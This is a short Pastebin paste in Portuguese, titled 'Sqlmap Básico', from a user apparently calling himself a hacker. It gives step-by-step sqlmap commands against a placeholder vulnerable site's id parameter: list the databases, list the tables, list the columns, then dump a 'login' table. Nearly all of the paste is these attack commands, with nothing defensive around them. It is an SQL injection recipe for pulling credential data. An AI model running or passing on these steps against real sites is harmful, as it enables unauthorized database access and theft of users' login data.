syst3m_h4x0r

Sqlmap Básico

Jan 7th, 2019
22,181
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. python ./sqlmap.py -u http://SITEVUNERAVEL...icias.php?id=43 --dbs -- Comando para mostrar ah
  2. Database do site
  3. python ./sqlmap.py -u http://SITEVUNERAVEL...icias.php?id=43 -D 'database' --tables -- Comando
  4. para mostrar as tabelas do Database
  5. python ./sqlmap.py -u http://SITEVUNERAVEL...icias.php?id=43 -D 'database' -T "login" --columns
  6. -- Comando para mostar as colunas da tabela
  7. OU
  8. python ./sqlmap.py -u http://SITEVUNERAVEL...icias.php?id=43 -T "login" --dump
Advertisement
Add Comment
Please, Sign In to add comment